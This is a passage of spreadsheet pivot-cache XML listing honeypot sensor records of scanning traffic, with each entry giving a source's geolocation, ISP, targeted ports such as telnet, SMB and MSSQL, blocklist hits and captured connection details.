64955&amp;&amp;53759&amp;&amp;64509&amp;&amp;53257"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="140810"/>
    <s v="Megacore Technology Company Limited"/>
    <s v="HTSG"/>
    <s v="business"/>
    <s v="Htsg High Technology Services and Media Joint Stock Company"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;stshash&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:674d:f129"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1826"/>
    <x v="1826"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T15:50:52"/>
    <d v="2025-04-14T10:56:11"/>
    <d v="2025-04-14T15:50:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:670a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1827"/>
    <x v="1827"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T15:47:08"/>
    <d v="2025-04-14T15:47:08"/>
    <d v="2025-04-14T15:47:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783b:b56e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1828"/>
    <x v="1828"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T15:44:26"/>
    <d v="2023-08-10T12:59:00"/>
    <d v="2025-04-14T15:44:26"/>
    <n v="208"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;445&amp;&amp;48555"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="01"/>
    <s v="Gīlān"/>
    <s v="NA"/>
    <s v="Rasht (District 4)"/>
    <s v="118743"/>
    <s v="NA"/>
    <s v="37.2436"/>
    <s v="49.5776"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="DCI"/>
    <s v="business"/>
    <s v="Islamic Azad University of Rasht"/>
    <s v="2001-04-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (217.219.185.9,61766)}&amp;&amp;{Data_SMB:Incoming connection (217.219.185.9,62426)}&amp;&amp;{Data_SMB:Incoming connection (217.219.185.9,58723)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (217.219.185.9,60181)}&amp;&amp;{Data_SMB:Incoming connection (217.219.185.9,60614)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d9db:b909"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1829"/>
    <x v="1829"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T15:34:59"/>
    <d v="2025-04-14T15:34:59"/>
    <d v="2025-04-14T15:34:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SC"/>
    <s v="Santa Catarina"/>
    <s v="Tunápolis"/>
    <s v="Iporã do Oeste"/>
    <s v="3461088"/>
    <s v="NA"/>
    <s v="-26.988"/>
    <s v="-53.5346"/>
    <s v="265083"/>
    <s v="AS265083"/>
    <s v="UltraWeb Telecomunicações LTDA"/>
    <s v="corporate"/>
    <s v="UltraWeb Telecomunicações LTDA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:aae9:c434"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1830"/>
    <x v="1830"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T15:31:46"/>
    <d v="2025-04-14T15:31:46"/>
    <d v="2025-04-14T15:31:46"/>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f:a37f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1831"/>
    <x v="1831"/>
    <s v="cpc86064-nott19-2-0-cust277.12-2.cable.virginm.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T15:30:21"/>
    <d v="2025-04-14T15:01:02"/>
    <d v="2025-04-14T15:30:21"/>
    <n v="53"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Nottingham"/>
    <s v="New Basford"/>
    <s v="11863042"/>
    <s v="NA"/>
    <s v="52.9734"/>
    <s v="-1.16564"/>
    <s v="5089"/>
    <s v="Virgin Media Limited"/>
    <s v="Virgin Media"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2002-06-14"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:516d:5916"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1832"/>
    <x v="1832"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T15:29:41"/>
    <d v="2025-01-03T19:51:17"/>
    <d v="2025-04-14T15:29:41"/>
    <n v="39"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Rajkot"/>
    <s v="Rajkot (Jagnath Plot)"/>
    <s v="1258847"/>
    <s v="360004"/>
    <s v="22.2934"/>
    <s v="70.7906"/>
    <s v="45117"/>
    <s v="Ishan's Network"/>
    <s v="INPL's"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bfc:3ce8"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1833"/>
    <x v="1833"/>
    <s v="114-32-249-227.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T15:15:25"/>
    <d v="2024-08-20T23:28:11"/>
    <d v="2025-04-14T15:15:25"/>
    <n v="1949"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;55962&amp;&amp;23&amp;&amp;23448&amp;&amp;53712&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7220:f9e3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1834"/>
    <x v="1834"/>
    <s v="114-33-72-89.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T15:10:42"/>
    <d v="2025-01-16T17:56:08"/>
    <d v="2025-04-14T15:10:42"/>
    <n v="275"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:4859"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1835"/>
    <x v="1835"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T14:59:15"/>
    <d v="2025-04-14T14:59:15"/>
    <d v="2025-04-14T14:59:15"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:7c8f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1836"/>
    <x v="1836"/>
    <s v="NA&amp;&amp;118-171-34-148.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-14T14:59:04"/>
    <d v="2025-04-14T14:58:18"/>
    <d v="2025-04-14T14:59:04"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:76ab:2294"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1837"/>
    <x v="1837"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T14:46:21"/>
    <d v="2024-11-28T23:08:16"/>
    <d v="2025-04-14T14:46:21"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_POSTGRES_H47"/>
    <s v="3306&amp;&amp;5432"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam'&amp;&amp; 'exploits']}"/>
    <n v="156"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="Railtel"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b7a:3cc2"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1838"/>
    <x v="1838"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T14:33:00"/>
    <d v="2025-03-07T16:12:34"/>
    <d v="2025-04-14T14:33:00"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="BB Multiplay Static"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.247.87.9,49710)}&amp;&amp;{Data_SMB:Incoming connection (117.247.87.9,50487)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:5709"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1839"/>
    <x v="1839"/>
    <s v="NA&amp;&amp;59-126-65-199.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-14T14:29:45"/>
    <d v="2025-04-14T13:41:43"/>
    <d v="2025-04-14T14:29:45"/>
    <n v="43"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="23"/>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
    <s v="{Data_TELNET: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3b7e:41c7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1840"/>
    <x v="1840"/>
    <s v="NA&amp;&amp;220-132-170-229.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-14T14:10:31"/>
    <d v="2024-02-01T22:12:00"/>
    <d v="2025-04-14T14:10:31"/>
    <n v="1532"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5014&amp;&amp;23&amp;&amp;80&amp;&amp;9100&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:aae5"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
